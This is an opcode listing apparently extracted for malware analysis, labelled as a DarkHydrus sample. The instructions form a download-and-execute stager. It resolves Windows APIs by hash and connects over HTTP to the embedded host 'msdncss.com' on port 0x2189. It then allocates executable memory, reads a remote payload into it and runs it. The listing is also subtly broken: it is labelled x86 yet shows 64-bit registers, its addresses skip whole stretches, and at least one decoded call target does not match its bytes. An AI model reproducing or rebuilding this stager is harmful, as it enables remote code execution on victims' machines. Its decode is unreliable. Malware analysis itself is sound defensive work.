# Opcode extraction for malware analysis
# APT Group: 16-G0079-DarkHydrus-2
# Malware Hash: c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3
# Executable format: Portable Executable (PE)
# Processor: x86
# Creation date: Mon Nov 04 01:33:13 EST 2024
# Format: <Address> | <Bytes> | <Mnemonic> | <Full Instruction>

00401000 | 8d 85 70 fe ff ff | LEA | LEA EAX,[RBP + -0x190]
00401006 | 50 | PUSH | PUSH RAX
00401007 | 68 01 01 00 00 | PUSH | PUSH 0x101
0040100c | ff 15 18 50 40 00 | CALL | CALL qword ptr [0x0080602a]
00401012 | 90 | NOP | NOP
00401013 | 90 | NOP | NOP
00401014 | 90 | NOP | NOP
00401015 | 90 | NOP | NOP
00401016 | 90 | NOP | NOP
00401017 | 90 | NOP | NOP
00401018 | 90 | NOP | NOP
00401019 | 90 | NOP | NOP
0040101a | 90 | NOP | NOP
0040101b | 90 | NOP | NOP
0040101c | 90 | NOP | NOP
0040101d | 90 | NOP | NOP
0040101e | 90 | NOP | NOP
0040101f | 90 | NOP | NOP
00401020 | fc | CLD | CLD
00401021 | e8 89 00 00 00 | CALL | CALL 0x004010af
004010af | 5d | POP | POP RBP
004010b0 | 68 6e 65 74 00 | PUSH | PUSH 0x74656e
004010b5 | 68 77 69 6e 69 | PUSH | PUSH 0x696e6977
004010ba | 54 | PUSH | PUSH RSP
004010bb | 68 4c 77 26 07 | PUSH | PUSH 0x726774c
004010c0 | ff d5 | CALL | CALL RBP
004010c2 | e8 80 00 00 00 | CALL | CALL 0x00401147
004010c7 | 4d 6f | OUTSD | OUTSD DX,RSI
004010c9 | 7a 69 | JP | JP 0x00401134
004010cb | 6c | INSB | INSB RDI,DX
004010cc | 6c | INSB | INSB RDI,DX
00401134 | 58 | POP | POP RAX
00401135 | 58 | POP | POP RAX
00401136 | 58 | POP | POP RAX
00401137 | 58 | POP | POP RAX
00401138 | 58 | POP | POP RAX
00401139 | 58 | POP | POP RAX
0040113a | 58 | POP | POP RAX
0040113b | 58 | POP | POP RAX
0040113c | 58 | POP | POP RAX
0040113d | 58 | POP | POP RAX
0040113e | 58 | POP | POP RAX
0040113f | 58 | POP | POP RAX
00401140 | 58 | POP | POP RAX
00401141 | 58 | POP | POP RAX
00401142 | 58 | POP | POP RAX
00401143 | 58 | POP | POP RAX
00401144 | 58 | POP | POP RAX
00401147 | 59 | POP | POP RCX
00401148 | 31 ff | XOR | XOR EDI,EDI
0040114a | 57 | PUSH | PUSH RDI
0040114b | 57 | PUSH | PUSH RDI
0040114c | 57 | PUSH | PUSH RDI
0040114d | 57 | PUSH | PUSH RDI
0040114e | 51 | PUSH | PUSH RCX
0040114f | 68 3a 56 79 a7 | PUSH | PUSH -0x5886a9c6
00401154 | ff d5 | CALL | CALL RBP
00401156 | eb 79 | JMP | JMP 0x004011d1
00401158 | 5b | POP | POP RBX
00401159 | 31 c9 | XOR | XOR ECX,ECX
0040115b | 51 | PUSH | PUSH RCX
0040115c | 51 | PUSH | PUSH RCX
0040115d | 6a 03 | PUSH | PUSH 0x3
0040115f | 51 | PUSH | PUSH RCX
00401160 | 51 | PUSH | PUSH RCX
00401161 | 68 89 21 00 00 | PUSH | PUSH 0x2189
00401166 | 53 | PUSH | PUSH RBX
00401167 | 50 | PUSH | PUSH RAX
00401168 | 68 57 89 9f c6 | PUSH | PUSH -0x396076a9
0040116d | ff d5 | CALL | CALL RBP
0040116f | eb 62 | JMP | JMP 0x004011d3
00401171 | 59 | POP | POP RCX
00401172 | 31 d2 | XOR | XOR EDX,EDX
00401174 | 52 | PUSH | PUSH RDX
00401175 | 68 00 02 60 84 | PUSH | PUSH -0x7b9ffe00
0040117a | 52 | PUSH | PUSH RDX
0040117b | 52 | PUSH | PUSH RDX
0040117c | 52 | PUSH | PUSH RDX
0040117d | 51 | PUSH | PUSH RCX
0040117e | 52 | PUSH | PUSH RDX
0040117f | 50 | PUSH | PUSH RAX
00401180 | 68 eb 55 2e 3b | PUSH | PUSH 0x3b2e55eb
00401185 | ff d5 | CALL | CALL RBP
00401187 | 89 c6 | MOV | MOV ESI,EAX
00401189 | 31 ff | XOR | XOR EDI,EDI
0040118b | 57 | PUSH | PUSH RDI
0040118c | 57 | PUSH | PUSH RDI
0040118d | 57 | PUSH | PUSH RDI
0040118e | 57 | PUSH | PUSH RDI
0040118f | 56 | PUSH | PUSH RSI
00401190 | 68 2d 06 18 7b | PUSH | PUSH 0x7b18062d
00401195 | ff d5 | CALL | CALL RBP
00401197 | 85 c0 | TEST | TEST EAX,EAX
00401199 | 74 44 | JZ | JZ 0x004011df
0040119b | 31 ff | XOR | XOR EDI,EDI
0040119d | 85 f6 | TEST | TEST ESI,ESI
0040119f | 74 04 | JZ | JZ 0x004011a5
004011a1 | 89 f9 | MOV | MOV ECX,EDI
004011a3 | eb 09 | JMP | JMP 0x004011ae
004011a5 | 68 aa c5 e2 5d | PUSH | PUSH 0x5de2c5aa
004011aa | ff d5 | CALL | CALL RBP
004011ac | 89 c1 | MOV | MOV ECX,EAX
004011ae | 68 45 21 5e 31 | PUSH | PUSH 0x315e2145
004011b3 | ff d5 | CALL | CALL RBP
004011b5 | 31 ff | XOR | XOR EDI,EDI
004011b7 | 57 | PUSH | PUSH RDI
004011b8 | 6a 07 | PUSH | PUSH 0x7
004011ba | 51 | PUSH | PUSH RCX
004011bb | 56 | PUSH | PUSH RSI
004011bc | 50 | PUSH | PUSH RAX
004011bd | 68 b7 57 e0 0b | PUSH | PUSH 0xbe057b7
004011c2 | ff d5 | CALL | CALL RBP
004011c4 | bf 00 2f 00 00 | MOV | MOV EDI,0x2f00
004011c9 | 39 c7 | CMP | CMP EDI,EAX
004011cb | 74 bc | JZ | JZ 0x00401189
004011cd | 31 ff | XOR | XOR EDI,EDI
004011cf | eb 15 | JMP | JMP 0x004011e6
004011d1 | eb 49 | JMP | JMP 0x0040121c
004011d3 | e8 99 ff ff ff | CALL | CALL 0x00401171
004011df | 68 f0 b5 a2 56 | PUSH | PUSH 0x56a2b5f0
004011e4 | ff d5 | CALL | CALL RBP
004011e6 | 6a 40 | PUSH | PUSH 0x40
004011e8 | 68 00 10 00 00 | PUSH | PUSH 0x1000
004011ed | 68 00 00 40 00 | PUSH | PUSH 0x400000
004011f2 | 57 | PUSH | PUSH RDI
004011f3 | 68 58 a4 53 e5 | PUSH | PUSH -0x1aac5ba8
004011f8 | ff d5 | CALL | CALL RBP
004011fa | 93 | XCHG | XCHG EAX,EBX
004011fb | 53 | PUSH | PUSH RBX
004011fc | 53 | PUSH | PUSH RBX
004011fd | 89 e7 | MOV | MOV EDI,ESP
004011ff | 57 | PUSH | PUSH RDI
00401200 | 68 00 20 00 00 | PUSH | PUSH 0x2000
00401205 | 53 | PUSH | PUSH RBX
00401206 | 56 | PUSH | PUSH RSI
00401207 | 68 12 96 89 e2 | PUSH | PUSH -0x1d7669ee
0040120c | ff d5 | CALL | CALL RBP
0040120e | 85 c0 | TEST | TEST EAX,EAX
00401210 | 74 cd | JZ | JZ 0x004011df
00401212 | 8b 07 | MOV | MOV EAX,dword ptr [RDI]
00401214 | 01 c3 | ADD | ADD EBX,EAX
00401216 | 85 c0 | TEST | TEST EAX,EAX
00401218 | 75 e5 | JNZ | JNZ 0x004011ff
0040121a | 58 | POP | POP RAX
0040121b | c3 | RET | RET
0040121c | e8 37 ff ff ff | CALL | CALL 0x00401158
00401221 | 6d | INSD | INSD RDI,DX
00401222 | 73 64 | JNC | JNC 0x00401288
00401224 | 6e | OUTSB | OUTSB DX,RSI
00401225 | 63 73 73 | MOVSXD | MOVSXD ESI,dword ptr [RBX + 0x73]
00401228 | 2e 63 6f 6d | MOVSXD | MOVSXD EBP,dword ptr CS:[RDI + 0x6d]
0040122c | 00 00 | ADD | ADD byte ptr [RAX],AL
0040122e | 00 00 | ADD | ADD byte ptr [RAX],AL
00401230 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401232 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401234 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401236 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401238 | 00 00 | ADD | ADD byte ptr [RAX],AL
0040123a | 00 00 | ADD | ADD byte ptr [RAX],AL
0040123c | 00 00 | ADD | ADD byte ptr [RAX],AL
0040123e | 00 00 | ADD | ADD byte ptr [RAX],AL
00401240 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401242 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401244 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401246 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401248 | 00 00 | ADD | ADD byte ptr [RAX],AL
0040124a | 00 00 | ADD | ADD byte ptr [RAX],AL
0040124c | 00 00 | ADD | ADD byte ptr [RAX],AL
00401288 | 00 00 | ADD | ADD byte ptr [RAX],AL
0040128a | 00 00 | ADD | ADD byte ptr [RAX],AL
0040128c | 00 00 | ADD | ADD byte ptr [RAX],AL
0040128e | 00 00 | ADD | ADD byte ptr [RAX],AL
00401290 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401292 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401294 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401296 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401298 | 00 00 | ADD | ADD byte ptr [RAX],AL
0040129a | 00 00 | ADD | ADD byte ptr [RAX],AL
0040129c | 00 00 | ADD | ADD byte ptr [RAX],AL
0040129e | 00 00 | ADD | ADD byte ptr [RAX],AL
004012a0 | 00 00 | ADD | ADD byte ptr [RAX],AL
004012a2 | 00 00 | ADD | ADD byte ptr [RAX],AL
004012a4 | 00 00 | ADD | ADD byte ptr [RAX],AL
004012a6 | 00 00 | ADD | ADD byte ptr [RAX],AL
004012a8 | 00 00 | ADD | ADD byte ptr [RAX],AL
